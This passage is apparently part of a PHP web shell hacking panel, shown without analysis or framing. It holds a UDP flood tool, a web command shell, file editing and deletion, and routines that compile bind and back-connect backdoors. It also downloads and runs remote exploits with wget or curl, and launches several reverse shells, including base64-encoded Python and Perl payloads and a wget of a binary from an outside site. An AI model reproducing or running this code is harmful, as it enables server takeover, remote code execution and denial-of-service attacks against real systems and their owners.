- //print "Started: ".time('d-m-y h:i:s')."<br>";
- $max_time = $time+$exec_time;
- $host = $_GET['host'];
- for($i=0;$i<65000;$i++){
- $out .= 'X';
- }
- while(1){
- $packets++;
- if(time() > $max_time){ break; }
- $rand = rand(1,65000);
- $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
- if($fp){
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
- echo '<br><br>
- <form action="'.$surl.'" method=GET>
- <input type="hidden" name="act" value="phptools">
- Host: <br><input type=text name=host><br>
- Length (seconds): <br><input type=text name=time><br>
- <input type=submit value=Go>
- </form>';
- }
- else
- {
- echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
- <table class="tabnet" style="width:300px;">
- <tr>
- <th colspan="2">UDP Flood</th>
- </tr>
- <tr>
- <td> Host</td>
- <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
- </tr>
- <tr>
- <td> Length (seconds)</td>
- <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
- </tr>
- <tr>
- <td><input style="width:100%;" class="inputzbut" type="submit" value="Go" /></td>
- </tr>
- </table>
- </center>';
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo'))
- {
- @ob_start();
- @eval("phpinfo();");
- $buff = @ob_get_contents();
- @ob_end_clean();
- $awal = strpos($buff,"<body>")+6;
- $akhir = strpos($buff,"</body>");
- echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
- }
- elseif(isset($_GET['view']) && ($_GET['view'] != ""))
- {
- if(is_file($_GET['view']))
- {
- if(!isset($file)) $file = magicboom($_GET['view']);
- if(!$win && $posix)
- {
- $name=@posix_getpwuid(@fileowner($file));
- $group=@posix_getgrgid(@filegroup($file));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else { $owner = $user; }
- $filn = basename($file);
- echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
- <tr>
- <td>Filename</td>
- <td>
- <span id=\"".clearspace($filn)."_link\">".$file."</span>
- <form action=\"?y=".$pwd."&view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
- </form>
- </td>
- </tr>
- <tr>
- <td>Size</td>
- <td>".ukuran($file)."</td>
- </tr>
- <tr>
- <td>Permission</td>
- <td>".get_perms($file)."</td>
- </tr>
- <tr>
- <td>Owner</td>
- <td>".$owner."</td>
- </tr>
- <tr>
- <td>Create time</td>
- <td>".date("d-M-Y H:i",@filectime($file))."</td>
- </tr>
- <tr>
- <td>Last modified</td>
- <td>".date("d-M-Y H:i",@filemtime($file))."</td>
- </tr>
- <tr>
- <td>Last accessed</td>
- <td>".date("d-M-Y H:i",@fileatime($file))."</td>
- </tr>
- <tr>
- <td>Actions</td>
- <td><a href=\"?y=$pwd&edit=$file\">edit</a>
- | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
- | <a href=\"?y=$pwd&delete=$file\">delete</a>
- | <a href=\"?y=$pwd&dl=$file\">download</a> (<a href=\"?y=$pwd&dlgzip=$file\">gz</a>)
- </td>
- </tr>
- <tr>
- <td>View</td>
- <td><a href=\"?y=".$pwd."&view=".$file."\">text</a>
- | <a href=\"?y=".$pwd."&view=".$file."&type=code\">code</a>
- | <a href=\"?y=".$pwd."&view=".$file."&type=image\">img</a>
- </td>
- </tr>
- </table> ";
- if(isset($_GET['type']) && ($_GET['type']=='image'))
- { echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&img=".$filn."\"></div>"; }
- elseif(isset($_GET['type']) && ($_GET['type']=='code'))
- { echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; }
- else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; }
- }
- elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); }
- }
- elseif(isset($_GET['edit']) && ($_GET['edit'] != ""))
- {
- if(isset($_POST['save']))
- {
- $file = $_POST['saveas'];
- $content = magicboom($_POST['content']);
- if($filez = @fopen($file,"w"))
- {
- $time = date("d-M-Y H:i",time());
- if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
- else $msg = "failed to save"; @fclose($filez);
- }
- else $msg = "permission denied";
- }
- if(!isset($file)) $file = $_GET['edit'];
- if($filez = @fopen($file,"r"))
- {
- $content = "";
- while(!feof($filez))
- {
- $content .= htmlentities(str_replace("''","'",fgets($filez)));
- }
- @fclose($filez);
- } ?>
- <form action="?y=<?php echo $pwd; ?>&edit=<?php echo $file; ?>" method="post">
- <table class="cmdbox">
- <tr>
- <td colspan="2">
- <textarea class="output" name="content"><?php echo $content; ?></textarea>
- </td>
- <tr>
- <td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
- <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
- <?php echo $msg; ?>
- </td>
- </tr>
- </table>
- </form>
- <?php
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'upload'))
- {
- if(isset($_POST['uploadcomp']))
- {
- if(is_uploaded_file($_FILES['file']['tmp_name']))
- {
- $path = magicboom($_POST['path']);
- $fname = $_FILES['file']['name'];
- $tmp_name = $_FILES['file']['tmp_name'];
- $pindah = $path.$fname;
- $stat = @move_uploaded_file($tmp_name,$pindah);
- if ($stat) { $msg = "file uploaded to $pindah"; }
- else $msg = "failed to upload $fname";
- }
- else $msg = "failed to upload $fname";
- }
- elseif(isset($_POST['uploadurl']))
- {
- $pilihan = trim($_POST['pilihan']);
- $wurl = trim($_POST['wurl']);
- $path = magicboom($_POST['path']);
- $namafile = download($pilihan,$wurl);
- $pindah = $path.$namafile;
- if(is_file($pindah)) { $msg = "file uploaded to DIR $pindah"; }
- else $msg = "failed ! to upload $namafile"; }
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=upload" enctype="multipart/form-data" method="post">
- <table class="tabnet" style="width:320px;padding:0 1px;">
- <tr>
- <th colspan="2">Upload from computer</th>
- </tr>
- <tr>
- <td colspan="2">
- <p style="text-align:center;">
- <input style="color:#7CDA89;" type="file" name="file" />
- <input type="submit" name="uploadcomp" class="inputzbut" value="Go !" style="width:80px;">
- </p>
- </td>
- </tr>
- <tr>
- <td colspan="2">
- <input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" />
- </td>
- </tr>
- </table>
- </form>
- <table class="tabnet" style="width:320px;padding:0 1px;">
- <tr>
- <th colspan="2">Upload from url</th>
- </tr>
- <tr>
- <td colspan="2">
- <form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&x=upload">
- <table>
- <tr>
- <td>url</td>
- <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td>
- </tr>
- <tr>
- <td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td>
- </tr>
- <tr>
- <td>
- <select size="1" class="inputz" name="pilihan">
- <option value="wwget">wget</option>
- <option value="wlynx">lynx</option>
- <option value="wfread">fread</option>
- <option value="wfetch">fetch</option>
- <option value="wlinks">links</option>
- <option value="wget">GET</option>
- <option value="wcurl">curl</option>
- </select>
- </td>
- <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go !" style="width:246px;"></td>
- </tr>
- </table>
- </form>
- </td>
- </tr>
- </table>
- <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
- <?php }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit'))
- {
- if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C'))
- {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdc.c",$port_bind_bd_c);
- exe("gcc -o bdc bdc.c");
- exe("chmod 777 bdc");
- @unlink("bdc.c");
- exe("./bdc ".$port." ".$passwrd." &");
- $scan = exe("ps aux");
- if(eregi("./bdc $por",$scan))
- {
- $msg = "<p>Process found running, backdoor setup successfully.</p>";
- }
- else
- {
- $msg = "<p>Process not found running, backdoor not setup successfully.</p>";
- }
- }
- elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl'))
- {
- $port = trim($_POST['port']);
- $passwrd = trim($_POST['bind_pass']);
- tulis("bdp",$port_bind_bd_pl);
- exe("chmod 777 bdp");
- $p2=which("perl");
- exe($p2." bdp ".$port." &");
- $scan = exe("ps aux");
- if(eregi("$p2 bdp $port",$scan))
- { $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
- else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } }
- elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C'))
- {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis("bcc.c",$back_connect_c);
- exe("gcc -o bcc bcc.c");
- exe("chmod 777 bcc");
- @unlink("bcc.c");
- exe("./bcc ".$ip." ".$port." &");
- $msg = "Now script try connect to ".$ip." port ".$port." ...";
- }
- elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl'))
- {
- $ip = trim($_POST['ip']);
- $port = trim($_POST['backport']);
- tulis_2("bcp",$back_connect);
- exe("chmod +x bcp");
- $p2=which("perl");
- exe($p2." bcp ".$ip." ".$port." &");
- sleep(1);
- $msg = "Now script try connect to ".$ip." port ".$port." ...";
- unlink("bcp");
- }
- elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
- {
- $pilihan = trim($_POST['pilihan']);
- $wurl = trim($_POST['wurl']);
- $namafile = download($pilihan,$wurl);
- if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; }
- ?>
- <table class="tabnet">
- <tr>
- <th>Port Binding</th>
- <th>Connect Back</th>
- <th>Load and Exploit</th>
- </tr>
- <tr>
- <td>
- <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit">
- <table>
- <tr>
- <td>Port</td>
- <td>
- <input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>">
- </td>
- </tr>
- <tr>
- <td>Password</td>
- <td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td>
- </tr>
- <tr>
- <td>Use</td>
- <td style="text-align:justify">
- <p>
- <select class="inputz" size="1" name="use">
- <option value="Perl">Perl</option>
- <option value="C">C</option>
- </select>
- <input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
- </td>
- </tr>
- </table>
- </form>
- </td>
- <td>
- <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit">
- <table>
- <tr>
- <td>IP</td>
- <td>
- <input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>">
- </td>
- </tr>
- <tr>
- <td>Port</td>
- <td>
- <input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>">
- </td>
- </tr>
- <tr>
- <td>Use</td>
- <td style="text-align:justify">
- <p>
- <select size="1" class="inputz" name="use">
- <option value="Perl">Perl</option>
- <option value="C">C</option>
- </select>
- <input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
- </td>
- </tr>
- </table>
- </form>
- </td>
- <td>
- <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit">
- <table>
- <tr>
- <td>url</td>
- <td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
- </tr>
- <tr>
- <td>cmd</td>
- <td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
- </tr>
- <tr>
- <td>
- <select size="1" class="inputz" name="pilihan">
- <option value="wwget">wget</option>
- <option value="wlynx">lynx</option>
- <option value="wfread">fread</option>
- <option value="wfetch">fetch</option>
- <option value="wlinks">links</option>
- <option value="wget">GET</option>
- <option value="wcurl">curl</option>
- </select>
- </td>
- <td colspan="2">
- <input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
- </td>
- </tr>
- </table>
- </form>
- </td>
- </tr>
- </table>
- <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
- <?php }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'shell'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=shell" method="post">
- <table class="cmdbox">
- <tr>
- <td colspan="2">
- <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
- </td>
- </tr>
- <tr>
- <td colspan="2"><?php echo $prompt; ?>
- <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
- <input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
- </td>
- </tr>
- </table>
- </form> <?php
- }
- else
- {
- if(isset($_GET['delete']) && ($_GET['delete'] != ""))
- {
- $file = $_GET['delete']; @unlink($file);
- }
- elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != ""))
- {
- @exe('rm -rf '.$_GET['fdelete'].'');
- }
- elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != ""))
- {
- $path = $pwd.$_GET['mkdir']; @mkdir($path);
- }
- $buff = showdir($pwd,$prompt);
- echo $buff;
- }
- ?>
- </div>
- </font></font></span>
- <?php
- function printit ($string) {
- if (!$daemon) {
- print "$string\n";
- }
- }
- $bc = $_GET["BackConnect"];
- switch($bc){
- case "PHP_1":
- set_time_limit (0);
- $VERSION = "1.0";
- $ip = $_SERVER["REMOTE_ADDR"];
- $port = 22;
- $chunk_size = 1400;
- $write_a = null;
- $error_a = null;
- $shell = 'uname -a; w; id; /bin/sh -i';
- $daemon = 0;
- $debug = 0;
- if (function_exists('pcntl_fork')) {
- $pid = pcntl_fork();
- if ($pid == -1) {
- printit("ERROR: Can't fork");
- exit(1);
- }
- if ($pid) {
- exit(0); // Parent exits
- }
- if (posix_setsid() == -1) {
- printit("Error: Can't setsid()");
- exit(1);
- }
- $daemon = 1;
- } else {
- print("WARNING: Failed to daemonise. This is quite common and not fatal.");
- }
- // Change to a safe directory
- chdir("/");
- // Remove any umask we inherited
- umask(0);
- //
- // Do the reverse shell...
- //
- // Open reverse connection
- $sock = fsockopen($ip, $port, $errno, $errstr, 30);
- if (!$sock) {
- printit("$errstr ($errno)");
- exit(1);
- }
- // Spawn shell process
- $descriptorspec = array(
- 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
- 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
- 2 => array("pipe", "w") // stderr is a pipe that the child will write to
- );
- $process = proc_open($shell, $descriptorspec, $pipes);
- if (!is_resource($process)) {
- printit("ERROR: Can't spawn shell");
- exit(1);
- }
- // Set everything to non-blocking
- // Reason: Occsionally reads will block, even though stream_select tells us they won't
- stream_set_blocking($pipes[0], 0);
- stream_set_blocking($pipes[1], 0);
- stream_set_blocking($pipes[2], 0);
- stream_set_blocking($sock, 0);
- printit("Successfully opened reverse shell to $ip:$port");
- while (1) {
- // Check for end of TCP connection
- if (feof($sock)) {
- printit("ERROR: Shell connection terminated");
- break;
- }
- // Check for end of STDOUT
- if (feof($pipes[1])) {
- printit("ERROR: Shell process terminated");
- break;
- }
- // Wait until a command is end down $sock, or some
- // command output is available on STDOUT or STDERR
- $read_a = array($sock, $pipes[1], $pipes[2]);
- $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
- // If we can read from the TCP socket, send
- // data to process's STDIN
- if (in_array($sock, $read_a)) {
- if ($debug) printit("SOCK READ");
- $input = fread($sock, $chunk_size);
- if ($debug) printit("SOCK: $input");
- fwrite($pipes[0], $input);
- }
- // If we can read from the process's STDOUT
- // send data down tcp connection
- if (in_array($pipes[1], $read_a)) {
- if ($debug) printit("STDOUT READ");
- $input = fread($pipes[1], $chunk_size);
- if ($debug) printit("STDOUT: $input");
- fwrite($sock, $input);
- }
- // If we can read from the process's STDERR
- // send data down tcp connection
- if (in_array($pipes[2], $read_a)) {
- if ($debug) printit("STDERR READ");
- $input = fread($pipes[2], $chunk_size);
- if ($debug) printit("STDERR: $input");
- fwrite($sock, $input);
- }
- }
- fclose($sock);
- fclose($pipes[0]);
- fclose($pipes[1]);
- fclose($pipes[2]);
- proc_close($process);
- // Like print, but does nothing if we've daemonised ourself
- // (I can't figure out how to redirect STDOUT like a proper daemon)
- break;
- case "PHP_2":
- $ipim=$_SERVER["REMOTE_ADDR"];
- $portum="22";
- if ($ipim <> "")
- {
- $mucx=fsockopen($ipim , $portum , $errno, $errstr );
- if (!$mucx){
- $result = "Error: didnt connect !!!";
- }
- else {
- $zamazing0="\n";
- fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
- fputs($mucx , system("uname -a") .$zamazing0 );
- fputs($mucx , system("pwd") .$zamazing0 );
- fputs($mucx , system("id") .$zamazing0.$zamazing0 );
- while(!feof($mucx)){
- fputs ($mucx);
- $one="[$";
- $two="]";
- $result= fgets ($mucx, 8192);
- $message=`$result`;
- fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
- }
- fclose ($mucx);
- }
- }
- break;
- case "PHP_3":
- $fipn=$_SERVER["REMOTE_ADDR"];
- $bportn="22";
- if ($fipn <> "")
- {
- $fp=fsockopen($fipn , $bportn , $errno, $errstr);
- if (!$fp){
- $result = "Error: could not open socket connection";
- }
- else {
- fputs ($fp ,"\n
- whoami
- root
- :)\n\n");
- while(!feof($fp)){
- fputs ($fp);
- $result= fgets ($fp, 4096);
- $message=`$result`;
- fputs ($fp,"--> ".$message."\n");
- }
- fclose ($fp);
- }
- }
- break;
- case "PHP_4":
- #!/usr/bin/perl
- # coded by izo
- {
- print "root by izo\n";
- $fip=$_SERVER["REMOTE_ADDR"];
- $bport="22";
- system("wget http://paradiseinpuntagorda.com/images/dc");
- system("chmod 777 dc");
- system("./dc $fip $bport");
- }
- break;
- case "PHP_5":
- # coded by izo
- {
- print "Bağlanılıyor...\n";
- $fipc=$_SERVER["REMOTE_ADDR"];
- $bportc="22";
- $izoemmi = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uCiMjIyMjIyMjIyMjIyMjIyMjIyMjIwojLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0rCiMgICAgICAgICAgICAgICAgICAg
- ICAgLl9fX19fX19fX19fX19fX19fX19fXy4gIHwKIyAgIGNvZGVkIGJ5IHNsYXYwbmljICB8IHNs
- YXYwbmljMEBnbWFpbC5jb20gfCAgfCAgICAKIyAgICAgICAgICAgICAgICAgICAgICBeLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tXiAgfAojIHNpdGU6IHNsYXYwbmljLnhzcy5ydSAgICAgICAgICAgICAg
- ICAgICAgICAgICB8CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLSsKI2ZvciBzZXR1cCBhIGxpc3RlbmluZyBwb3J0IG9uIHlvdXIgaG9zdDogbmMgLWwgLXAg
- W3BvcnRdIAojVXNlOiBweXRob24gc2xfYmMucHkgW2hvc3RdIFtwb3J0XSB8fCBzbF9iYy5weSAt
- ZGVmYXVsdCBzZXR0aW5ncwoKZnJvbSBzb2NrZXQgaW1wb3J0ICoKaW1wb3J0IG9zCmltcG9ydCBt
- ZDUKaW1wb3J0IHN5cwoKIyMjIyMjIyMjIyNfRGVmYXVsdF8jIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMKaG9zdD0nbG9jYWxob3N0JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAjCnBvcnQ9NjY2
- NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIwphdXRvY29tbWFuZHM9InVuc2V0
- IEhJU1RGSUxFO3VuYW1lIC1hO2lkIiAgICMKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
- IyMjIyMjIyMjIyMjIyMKaWYgbGVuKHN5cy5hcmd2KT4xOgogICAgaG9zdD1zeXMuYXJndlsxXQog
- ICAgaWYgbGVuKHN5cy5hcmd2KT4yOgogICAgICAgIHBvcnQ9aW50KHN5cy5hcmd2WzJdKQpwcmlu
- dCAiWytdaG9zdDpwb3J0PSAlczolaSIlKGhvc3QscG9ydCkKICAgICAgICAKaW5mbz1vcy5wb3Bl
- bihhdXRvY29tbWFuZHMpLnJlYWQoKQp0cnk6CiAgICBzb2Nrb2JqPXNvY2tldChBRl9JTkVULFNP
- Q0tfU1RSRUFNKQogICAgc29ja29iai5jb25uZWN0KChob3N0LHBvcnQpKQpleGNlcHQ6CiAgICBw
- cmludCAnWy1dU29ja2V0RXJyb3InLHN5cy5leGNfdmFsdWUKICAgIHN5cy5leGl0KDEpCnNvY2tv
- Ymouc2VuZCgiLjpiaW5ic2hlbGw6LlxuICVzIiVpbmZvKQpvcy5kdXAyKHNvY2tvYmouZmlsZW5v
- KCksMikKb3MuZHVwMihzb2Nrb2JqLmZpbGVubygpLDEpCm9zLmR1cDIoc29ja29iai5maWxlbm8o
- KSwwKQpvcy5leGVjbCgiL2Jpbi9zaCIsInNoIik=';
- $file = fopen("conp" ,"w+");
- $write = fwrite ($file ,base64_decode($izoemmi));
- fclose($file);
- chmod("conp" , 0777);
- system("./conp $fipc $bportc");
- }
- break;
- case "PHP_6":
- mkdir('cgitelnet1', 0755);
- chdir('cgitelnet1');
- $kokdosya = ".htaccess";
- $dosya_adi = "$kokdosya";
- $dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
- $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
- AddType application/x-httpd-cgi .cin
- AddHandler cgi-script .cin
- AddHandler cgi-script .cin";
- fwrite ( $dosya , $metin ) ;
- fclose ($dosya);
- $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
- cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
- IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
- cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
- b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
- cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
- dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
- cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
- biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
- ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
- bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
- cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
- DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
- dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
- ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
- CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
- ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
- aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
- cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
- IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
- dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
- CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
- IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
- bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
- VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
- ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
- InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
- ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
- ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
- YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
- bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
- bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
- aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
- OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
- R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
- DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
